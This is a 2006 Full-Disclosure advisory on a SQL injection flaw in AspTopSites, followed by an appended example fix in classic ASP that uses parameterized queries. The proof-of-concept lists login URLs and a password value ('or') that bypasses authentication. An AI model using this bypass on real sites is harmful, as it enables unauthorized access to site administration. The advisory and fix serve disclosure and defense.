[Full-disclosure] AspTopSites SQL injection
- To: <full-disclosure@xxxxxxxxxxxxxxxxx>
- Subject: [Full-disclosure] AspTopSites SQL injection
- From: "Morning Wood" <se_cur_ity@xxxxxxxxxxx>
- Date: Tue, 10 Jan 2006 11:25:04 -0800
------------------------------------------------------------
- EXPL-A-2006-001 exploitlabs.com Advisory 047 -
------------------------------------------------------------
- AspTopSites -
AFFECTED PRODUCTS
=================
AspTopSites
http://www.maine-net.com/aspts.asp
OVERVIEW
========
AspTopSites® runs on your Windows NT/2K/2003 Server
and uses Active Server Pages with a MS Access 2000 database.
Simply upload AspTopSites®, make one configuration setting
and you're ready to start running your own TopSites traffic
generator. AspTopSites® comes with full source code...
no encoding or DLLs need to be installed on the server.
DETAILS
=======
1. SQL Injection
AspTopSites does not filter SQL from user input, resulting in
full access to the user manager menu.
POC
===
1.
---
Entering a SQL injection-style statement in the password field
causes the login statement to evaluate as true.
http://[host]/topsites/default.asp <--- view listings
http://[host]/topsites/goto.asp?id=43 <--- mouseover id value
http://[host]/topsites/includeloginuser.asp <--- login here
user: [ id value ]
password: 'or'
Note: the vendor demo site is vulnerable.
SOLUTION:
=========
vendor contact:
Jan 3, 2006 wills@xxxxxxxxxxxxx ( no resp )
Jan 10, 2006 ( no resp => release )
Credits
=======
This vulnerability was discovered and researched by
Donnie Werner of exploitlabs
Donnie Werner
mail: wood at exploitlabs.com
mail: morning_wood at zone-h.org
--
web: http://exploitlabs.com
web: http://zone-h.org
http://www.exploitlabs.com/files/advisories/EXPL-A-2006-001-asptopsites.txt
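
The advisory lists no fix, so here is one way a classic ASP login against an Access database can bind the two login fields as parameters instead of concatenating them into the SQL string. This is an added example, not code from AspTopSites or from the advisory; the table, column and form-field names and the database path are assumptions.

```asp
<%
Option Explicit
' Hypothetical names throughout: tblSites, SiteID, SitePassword, the form
' fields "user"/"password" and the .mdb path are assumptions, not the
' product's real schema.
Const adCmdText = 1, adParamInput = 1, adInteger = 3, adVarWChar = 202

Function CheckLogin(conn, rawId, rawPassword)
    CheckLogin = False

    ' The user field is a numeric listing id: reject anything but digits.
    Dim re : Set re = New RegExp
    re.Pattern = "^\d{1,9}$"
    If Not re.Test(rawId) Then Exit Function
    If Len(rawPassword) = 0 Or Len(rawPassword) > 64 Then Exit Function

    Dim cmd : Set cmd = Server.CreateObject("ADODB.Command")
    Set cmd.ActiveConnection = conn
    cmd.CommandType = adCmdText
    ' Positional placeholders: the values are bound as data and are never
    ' parsed as SQL, so a quote in the password cannot end the string literal.
    cmd.CommandText = "SELECT COUNT(*) FROM tblSites " & _
                      "WHERE SiteID = ? AND SitePassword = ?"
    cmd.Parameters.Append cmd.CreateParameter("id", adInteger, adParamInput, , CLng(rawId))
    cmd.Parameters.Append cmd.CreateParameter("pw", adVarWChar, adParamInput, 64, rawPassword)

    Dim rs : Set rs = cmd.Execute
    ' Exactly one matching row means the id/password pair is valid.
    CheckLogin = (rs(0).Value = 1)
    rs.Close
End Function

Dim conn : Set conn = Server.CreateObject("ADODB.Connection")
conn.Open "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & _
          Server.MapPath("/data/topsites.mdb")

If CheckLogin(conn, CStr(Request.Form("user")), CStr(Request.Form("password"))) Then
    Session("SiteID") = CLng(Request.Form("user"))
Else
    Response.Write "Login failed."
End If
conn.Close
%>
```

With this check, the `'or'` value from the POC is compared as a literal three-character password and matches no row.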
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/